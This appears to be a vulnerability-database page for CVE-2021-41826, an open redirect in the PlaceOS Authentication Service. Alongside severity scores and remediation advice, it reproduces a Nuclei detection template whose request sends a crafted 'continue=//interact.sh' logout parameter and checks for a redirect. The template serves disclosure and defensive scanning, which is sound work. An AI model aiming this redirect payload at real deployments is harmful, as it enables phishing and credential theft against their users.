Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-41826
HistorySep 30, 2021 - 5:19 p.m.

PlaceOS 1.2109.1 - Open Redirection

2021-09-3017:19:17
ProjectDiscovery
github.com
1

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.939 High

EPSS

Percentile

99.1%

PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.

id: CVE-2021-41826

info:
  name: PlaceOS 1.2109.1 - Open Redirection
  author: geeknik
  severity: medium
  description: PlaceOS Authentication Service before 1.29.10.0 allows app/controllers/auth/sessions_controller.rb open redirect.
  impact: |
    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
  remediation: |
    Apply the latest security patch or update to PlaceOS 1.2109.2 or higher to fix the open redirection vulnerability.
  reference:
    - https://github.com/PlaceOS/auth/issues/36
    - https://www.exploit-db.com/exploits/50359
    - https://nvd.nist.gov/vuln/detail/CVE-2021-41826
    - http://packetstormsecurity.com/files/164345/PlaceOS-1.2109.1-Open-Redirection.html
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-41826
    cwe-id: CWE-601
    epss-score: 0.93913
    epss-percentile: 0.99086
    cpe: cpe:2.3:a:place:placeos_authentication:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: place
    product: placeos_authentication
  tags: cve2021,cve,redirect,edb,packetstorm,placeos,place

http:
  - method: GET
    path:
      - "{{BaseURL}}/auth/logout?continue=//interact.sh"

    matchers-condition: and
    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'

      - type: status
        status:
          - 302
          - 301
        condition: or
# digest: 490a00463044022017790fa96ae38831e7d2e13ad5e0a2e7a8b62217e8b6567c06c141553383f84502203f30b03cf1d6b8062bc3d29885bf4290fcff20fa3cfe698612dc0021397449d5:922c64590222798bb761d5b6d8e72950

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

5.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:P/I:P/A:N

0.939 High

EPSS

Percentile

99.1%

Related for NUCLEI:CVE-2021-41826